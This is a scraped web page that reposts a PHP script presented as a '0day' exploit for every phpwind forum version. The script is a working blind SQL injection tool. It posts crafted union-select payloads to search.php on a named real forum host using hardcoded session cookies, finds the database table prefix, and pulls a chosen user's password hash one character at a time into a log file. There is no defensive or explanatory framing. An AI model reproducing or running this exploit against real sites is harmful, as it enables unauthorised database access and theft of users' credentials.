Home  >  Article  >  Backend Development  >  phpwind 0day code found from the Internet_PHP tutorial

phpwind 0day code found from the Internet_PHP tutorial

WBOY
WBOYOriginal
2016-07-21 15:58:511271browse




Codz By 剑心

The Exploiet Of The All Phpwind Version

BY 剑心










ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';


$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;


$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: '.$match[1]."
";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!
");
else {echo "Maybe It is not vul!
";die();}

echo "Try to Get the uid=$uid 's Password:";
$log=fopen('log.txt','a+');


for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!
";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");


}
fclose($log);
echo "
Done!We Post $count times!
";


function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1rn";
$message .= "Accept: */*rn";
$message .= "Accept-Language: zh-cnrn";
$message .= "Referer: http://".$server.$path."rn";
$message .= "Content-Type: application/x-www-form-urlencodedrn";
$message .= "User-Agent: ".$useragent."rn";
$message .= "Host: ".$server."rn";
$message .= "Content-length: ".strlen($cmd)."rn";
$message .= "Connection: Keep-Alivern";
$message .= "Cookie: ".$cookie."rn";
$message .= "rn";
$message .= $cmd."rn";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "

";<br>while($fd&&!feof($fd)) {<br>$resp .= fread($fd,1024);<br>}<br>fclose($fd);<br>$resp .="
";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/317478.htmlTechArticlehtml head meta http-equiv="Content-Type" content="text/html; charset=gb2312" titleCodz By 剑心/title style type="text/css" body,td { font-family: "Tahoma"; font-size: "12px"; lin...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn